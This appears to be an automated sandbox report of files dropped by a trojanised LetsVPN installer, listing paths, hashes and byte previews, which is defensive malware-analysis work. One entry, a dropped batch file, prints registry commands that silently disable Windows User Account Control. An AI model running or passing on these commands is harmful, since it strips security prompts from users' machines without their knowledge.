C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wux4kqx0.b3o.ps1

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xuwhxb1m.sak.psm1

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\System.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.890541747176257
Encrypted:	false
SSDEEP:	192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:	75ED96254FBF894E42058062B4B4F0D1
SHA1:	996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:	A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:	58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\modern-header.bmp

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PC bitmap, Windows 3.x format, 150 x 57 x 8, image size 8666, resolution 2834 x 2834 px/m, 255 important colors, cbSize 9740, bits offset 1074
Category:	dropped
Size (bytes):	9740
Entropy (8bit):	6.554125039233327
Encrypted:	false
SSDEEP:	192:bDIK82wKywC116+rwdTKMRjwgKhww4R1jwlIHvNbmwQo8TTJG4:bv82wKywC7DrwdTKMRjwgKhwwY1jwlQq
MD5:	5ACF495828FEAE7F85E006B7774AF497
SHA1:	5D2EEF3EEBB9A72678DCCD404475341116508306
SHA-256:	6CFEBB59F0BA1B9F1E8D7AA6387F223A468EB2FF74A9ED3C3F4BB688C2B6455E
SHA-512:	D1D40C88E2167315A309005B831ACBEAB0919D5A3B1FF5AAA273DB945C8818FC2118EFDB503E4BDA055F309306E72224F54DEF0B1F0AB6F61FE4DBA66784ED68
Malicious:	false
Preview:	BM.&......2...(.......9............!..................,...788.WXX.................................................................h...;m..i...f...O...l...)J[. :G.n...p...o...%AO.....y...W.......o...........8O[.C^l...........#.....................................p...........................................................?AB.....;....+;.>...+y..4....BY.V...f...H...5bz.%DU.j...j...h...d...b...W...N...]....0<.m...Dy..3Zo.c...U...q....Pb.s...v...v...M...y...{...q...}...}.......y............+3.............g...................................Nn..Hfv.................&5=.................................................................................................................................^s~.............................................................................................................................8....Tt.G....!+..........%..................................................\gn.............................................#$%.oqs.....zz{...................................

C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\modern-wizard.bmp

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51498, resolution 2834 x 2834 px/m, 255 important colors, cbSize 52572, bits offset 1074
Category:	dropped
Size (bytes):	52572
Entropy (8bit):	7.144132089574
Encrypted:	false
SSDEEP:	192:mfR2FYRtCc9X1uikvgqm+LPTTw9Bu8Skn+x23acmHjZXuxZpCAe9Crxpn319UDSQ:mf0YRt/km+b3wG0nt2UC6rOf
MD5:	7F8E1969B0874C8FB9AB44FC36575380
SHA1:	3057C9CE90A23D29F7D0854472F9F44E87B0F09A
SHA-256:	076221B4527FF13C3E1557ABBBD48B0CB8E5F7D724C6B9171C6AADADB80561DD
SHA-512:	7AA65CFADC2738C0186EF459D0F5F7F770BA0F6DA4CCD55A2CECA23627B7F13BA258136BAB88F4EEE5D9BB70ED0E8EB8BA8E1874B0280D2B08B69FC9BDD81555
Malicious:	false
Preview:	BM\.......2...(.......:...........*.......................Y[[.....z}~.................................................5by.k...6by.m...o...p...q...9dz.s...t...w...x...`...=f{.{.......}...................~...Q...........b.......-FS.~...m...v............%+.................................................................-;B.................................................................................................................................prs.;....AY.4...(m..E...P...\...f...l...n...o...8cz.l...r...q...q...r...s...t...l...v...u...;dz.v...y...w...w...z...i...y...z...{...~...}.......W...Jw..@g\|.....................]...@ey.................Go..............Ch\|.<]o.............................\|...@bt.9Wg.........5P_.....................................................`...c...t...q...............................................[q}.........................Rcl.....................................:....~...Ts.m........... 1;.......................................!.............+,-...........

C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsDialogs.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.101872593207892
Encrypted:	false
SSDEEP:	192:oF8cSzvTyl4tgi8pPjQM0PuAg0YNy8IFtSP:EBSzm+t18pZ0WAg0R8IFg
MD5:	CA95C9DA8CEF7062813B989AB9486201
SHA1:	C555AF25DF3DE51AA18D487D47408D5245DBA2D1
SHA-256:	FEB6364375D0AB081E9CDF11271C40CB966AF295C600903383B0730F0821C0BE
SHA-512:	A30D94910204D1419C803DC12D90A9D22F63117E4709B1A131D8C4D5EAD7E4121150E2C8B004A546B33C40C294DF0A74567013001F55F37147D86BB847D7BBC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....oZ...........!.........0...............0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..v............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsExec.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.156301589898623
Encrypted:	false
SSDEEP:	96:cjHFiKaoggCtJzTlKXb0tbo68qD853Ns7GgmkNG3m+s:9bogRtJzTlNR8qD85uGgmkNP
MD5:	3D366250FCF8B755FCE575C75F8C79E4
SHA1:	2EBAC7DF78154738D41AAC8E27D7A0E482845C57
SHA-256:	8BDD996AE4778C6F829E2BCB651C55EFC9EC37EEEA17D259E013B39528DDDBB6
SHA-512:	67D2D88DE625227CCD2CB406B4AC3A215D1770D385C985A44E2285490F49B45F23CE64745B24444E2A0F581335FDA02E913B92781043E8DFD287844435BA9094
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L.....oZ...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC3E1.tmp

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC402.tmp

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	data
Category:	dropped
Size (bytes):	10739
Entropy (8bit):	7.214364446291792
Encrypted:	false
SSDEEP:	192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
MD5:	F73AC62E8DF97FAF3FC8D83E7F71BF3F
SHA1:	619A6E8F7A9803A4C71F73060649903606BEAF4E
SHA-256:	CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
SHA-512:	F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
Malicious:	false
Preview:	0.)....H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC422.tmp

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\oemvista.inf (copy)

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\tap0901.cat (copy)

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	data
Category:	dropped
Size (bytes):	10739
Entropy (8bit):	7.214364446291792
Encrypted:	false
SSDEEP:	192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
MD5:	F73AC62E8DF97FAF3FC8D83E7F71BF3F
SHA1:	619A6E8F7A9803A4C71F73060649903606BEAF4E
SHA-256:	CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
SHA-512:	F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
Malicious:	false
Preview:	0.)....H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\tap0901.sys (copy)

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JM2KJ.bat

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	392
Entropy (8bit):	5.141040221765098
Encrypted:	false
SSDEEP:	12:jLMVjhR1mWEMlTLMVjhR1ZTLMVjhR16Xn:jIV1PMmIV1PZIV1P6X
MD5:	30D6EB22D6AEEC10347239B17B023BF4
SHA1:	E2A6F86D66C699F6E0FF1AC4E140AF4A2A4637D1
SHA-256:	659DF6B190A0B92FC34E3A4457B4A8D11A26A4CAF55DE64DFE79EB1276181F08
SHA-512:	500872C3F2F3F801EC51717690873194675CB7F32CC4A862C09D90C18638D364D49B0E04C32323F52734E5C806E3503A63AC755C7019D762786A72840123DF76
Malicious:	false
Preview:	reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed May 8 12:29:30 2024, mtime=Sat Jul 20 13:30:05 2024, atime=Wed May 8 12:29:30 2024, length=247272, window=hide
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	4.615581501759675
Encrypted:	false
SSDEEP:	24:8mG/44b9AEDdOE4fV/tG6iAsca1dyOd/UUxhvqygm:8mG/44b9TDdO1O6BsP1dyOdsYcyg
MD5:	FBD4886DC5F42BD11CCC4791FBF8F25E
SHA1:	61AF3FF0D8BF892973724AA8520D26D6FEC6018E
SHA-256:	331BC61857104A22A20D43FEEE0C34221619F757F27EBF56667CF7FE5043F938
SHA-512:	A248245824310CC15919ED2DBE4D9E24D88EA6A26D11B49AE92518D2FDCC43D3A3E4EF4BA082B5902CB6A1D0326349834CB9E2D5D6A45D4045A0B7EA0461BC87
Malicious:	false
Preview:	L..................F.... .....c.K.....P......c.K................................P.O. .:i.....+00.../C:\.....................1......X.s..PROGRA~2.........O.I.X.s....................V.......3.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......X.s..letsvpn.@.......X.s.X.s..............................l.e.t.s.v.p.n.....b.2......X.k .LetsPRO.exe.H......X.k.X.s..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X............ ......C:\Program Files (x86)\letsvpn\LetsPRO.exe..B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z\|...K.J.........`.......X.......226533...........hT..CrF.f4... .1+..Jc...-...-$..hT..CrF.f4... .1+..Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	824
Entropy (8bit):	3.377677862485207
Encrypted:	false
SSDEEP:	12:8wl0Va/ledp8A/LK4YRMbdpYgRtbdpYqQ/CNUvH4t2YZ/elFlSJm:8BdOAW4Y+djXdYOUFqy
MD5:	0011458DE2BFE4556889186A69473E2A
SHA1:	03B075F79791A3EA20E0CA82DC375F1E980C4386
SHA-256:	DB3312C1A2D480E1416930D0F28A1EDA75143B3FDF312C1F19510534FD37B9FA
SHA-512:	DA5DD6E5A253F13702DEB42BBA8E37349CB262F311D557B8891AD761387AF2B96B6B91E4BF7E637D3A7C14E2BFE61E476E44703417DE79930B210243A1B20082
Malicious:	false
Preview:	L..................F........................................................_....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".V.1...........letsvpn.@............................................l.e.t.s.v.p.n.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......A.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z\|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\Desktop\LetsVPN.lnk

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed May 8 12:29:30 2024, mtime=Sat Jul 20 13:30:10 2024, atime=Wed May 8 12:29:30 2024, length=247272, window=hide
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	4.647927039421563
Encrypted:	false
SSDEEP:	24:8mG/v4b9AEDdOE4PJC/tWp6iAscaXdyOd/UUxhvqygm:8mG/v4b9TDdO7j6BsPXdyOdsYcyg
MD5:	0DD8BB6499C68657A7F2EADC17DA1167
SHA1:	FDA2BA8001516F976AAD5AF5F6B6C50D58C99DD4
SHA-256:	4E9F51BE6E83553A064020AD8B878B1F57CF0D2386F7BB1BCD168D2EBF223505
SHA-512:	B0800199B481C56F0001224974E8BB008501A330045B7AFEC15964CC67E3FE3190AAF13B05EAD8B1A32FB61F158834810532B6E897001D2ED2E89CF19E59EA91
Malicious:	false
Preview:	L..................F.... .....c.K....]S......c.K................................P.O. .:i.....+00.../C:\.....................1......X.s..PROGRA~2.........O.I.X.s....................V.......3.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......X.s..letsvpn.@.......X.s.X.s..............................l.e.t.s.v.p.n.....b.2......X.k .LetsPRO.exe.H......X.k.X.s..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X............ ......C:\Program Files (x86)\letsvpn\LetsPRO.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........................@Z\|...K.J.........`.......X.......226533...........hT..CrF.f4... .1+..Jc...-...-$..hT..CrF.f4... .1+..Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

C:\Users\user\Videos\A2A20C2D~m8\Fqczh.exe

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	99904
Entropy (8bit):	6.435962118124312
Encrypted:	false
SSDEEP:	1536:xvQ8DfZL6Gp/N6EZZtS/PG4/L1VOKFcbXWIJJffAgv:xvQ8DZ2vEZZtS3FxVRiGCfhv
MD5:	8AA07B7C6C632F4EDF07A0E2B91F8566
SHA1:	2E72D725A845B532C19A422FB32DEB629F53C824
SHA-256:	DD8BFBB25430E7F19E24234494324264BE98AC0CC20B239E18B4DD35E26EC1BC
SHA-512:	A9B3EB0B0EAFC53ACE21E30C12CCB64B9FC152CDF52A4A2C0B395DC6F9D20181B3006DCE14A16226DF9010A68673BB71656D8A95AC0597A12D05C99D15E3F909
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+..E+..E+..E8.D)..E8.D'..Ej..D)..E8.D/..E8.D5..E"..E2..E+..E...Ej..D..Ej..D,..Ej.sE..E+..E..Ej..D..ERich+..E........................PE..L....)a[..........................................@.................................].....@.................................h...,.... ..H_...........r..@...............p........................... ...@...............T............................text.............................. ..`.rdata...n.......p..................@..@.data...............................@....rsrc...H_... ...`..................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\Videos\A2A20C2D~m8\SK.TXT

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	data
Category:	dropped
Size (bytes):	209640
Entropy (8bit):	7.999152537836755
Encrypted:	true
SSDEEP:	3072:1GBlmbO8lK2vI7qlRYMLnP6j7BLM9yg80idIlVW0QonaJsKc7VU68REgiWpdyj6o:OmbO8l1KYb72BLMcgNi+9QYav8N8R/yH
MD5:	05A8E84B7CE0E60EA6DCF1B42889A4CB
SHA1:	8E329C32770E175C1095D01DD0C1DE240D8D9BDF
SHA-256:	EE09FC18BE985FC13130825EFF2226823481EB3F30D7E413FFB66B6722C21B1D
SHA-512:	7318CC57C4917DB8847ADA6A5E8D3F20BE42F488962BE6BBFD1AD39430F9C2298B36C4D7916EA5E6012AE8770C4FF0BB8A6E6B4CAAC0CB8801B8157B35DB3FBF
Malicious:	false
